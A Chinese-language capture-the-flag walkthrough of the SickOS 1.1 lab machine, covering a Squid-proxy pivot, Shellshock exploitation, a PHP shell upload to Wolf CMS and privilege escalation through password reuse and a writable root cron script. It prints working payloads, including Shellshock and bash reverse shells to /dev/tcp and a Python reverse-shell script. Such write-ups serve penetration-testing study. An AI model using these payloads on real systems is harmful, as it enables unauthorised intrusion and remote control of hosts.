本文内容纯属虚构，攻略鸭求关注点赞支持！

测试机IP地址：192.168.31.167

外部信息收集

获取靶机地址

$ sudo arp-scan -l

192.168.31.147

端口扫描

Nmap结果：

22/tcp  open  ssh   syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1.1
3128/tcp open  http-proxy syn-ack ttl 64 Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

squid

msf6 > search squid
msf6 > use auxiliary/scanner/http/squid_pivot_scanning
> set RPORT 3128
> set RHOSTS 192.168.0.10
> set RANGE 192.168.0.10
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [192.168.0.10] 192.168.0.10 is alive.
[+] [192.168.0.10] 192.168.0.10:80 seems open (HTTP 200, server header: 'Apache/2.2.22 (Ubuntu)').
[-] [192.168.0.10] 192.168.0.10:443 unknown Squid proxy error: 'ERR_UNSUP_REQ 0' (HTTP 501)

浏览器设置HTTP代理

HTTP Proxy 192.168.31.147 3128

且代理localhost和127.0.0.1

/

burp配置上传流

/

系统export http_proxy="http://192.168.31.147:3128"(对fuff部分有效，对cURL有效，对nmap、nikto、浏览器未生效)

可访问http://192.168.31.147/

目录枚举

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.147/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
/
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128

结果：

connect          [Status: 200,
index        [Status: 200,
index.php        [Status: 200,
robots.txt       [Status: 200,
robots         [Status: 200,
/cgi-bin/        403

robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/cgi-bin/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
status        [Status: 200,

wolfcms

访问http://192.168.31.147/wolfcms/发现是博客
文章管理osted by Administrator

$ searchsploit wolfcms
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting   | php/webapps/18652.txt
WolfCMS 0.8.3.1 - Cross-Site Request Forgery                       | php/webapps/44418.txt
WolfCMS 0.8.3.1 - Open Redirection                  | php/webapps/44421.txt

$ searchsploit wolf
Wolf CMS - Arbitrary File Upload / Execution              | php/webapps/38000.txt
Wolf CMS 0.6.0b - Multiple Vulnerabilities                         | php/webapps/15614.html
Wolf CMS 0.7.5 - Multiple Vulnerabilities                          | php/webapps/18545.txt
Wolf CMS 0.8.2 - Arbitrary File Upload                             | php/webapps/36818.php
Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)                | php/remote/40004.rb

$ searchsploit -m 44421
http://192.168.31.147/wolfcms/?/admin/login
$ searchsploit -m 38000
http://192.168.31.147/wolfcms/?/admin/plugin/file_manager/browse/

漏洞利用

1.ShellShock破壳漏洞

验证：

$ curl -H "user-agent: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128
root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash

getshell：

nc -nvlp 1233
curl -H "user-agent: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.167/1233 <&1" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128

2.弱口令登录Wolf CMS并上传PHP reverse shell

使用admin:admin弱口令登录：

Wolf CMS 0.8.2
Name：Aministrator
Username：admin

上传PHP reverse shell：

点Files标签，在/wolfcms/public/目录下创建php-reverse-shell：s.php，点权限改为777
$ nc -nvlp 1234
$ nc -nvlp 2345

访问：http://192.168.31.147/wolfcms/public/s.php
$ whoami
www-data
$ bash -c "bash -i >& /dev/tcp/192.168.31.167/2345 0>&1"

权限提升

$ python -c 'import pty; pty.spawn("/bin/bash")'

1.密码重用，sudo提权

/var/www/wolfcms/config.php：

define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');

密码重用：

$ su sickos
Password: john@123sudo

sudo提权：

$ sudo -l
   (ALL : ALL) ALL

sickos@SickOs:~$ sudo su
root@SickOs:~#

2.定时任务，python文件可写

www-data@SickOs:/var/www$ ls -al
-rwxrwxrwx  1 root    root    109 Dec  5  2015 connect.py

$ cat connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"

$ ls -alhR /etc/cron*
/etc/cron.d:
-rw-r--r--  1 root root  102 Jun 20  2012 .placeholder
-rw-r--r--  1 root root   52 Dec  5  2015 automate
-rw-r--r--  1 root root  544 Jul  2  2015 php5

$ cat /etc/cron.d/automate
* * * * * root /usr/bin/python /var/www/connect.py

改connect.py内容为

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.31.167",1222))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

# id
uid=0(root) gid=0(root) groups=0(root)

其他

flag

# cat a*
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying

疑问求助

代理配置未完全理解，求教此题如何配置proxychains代理？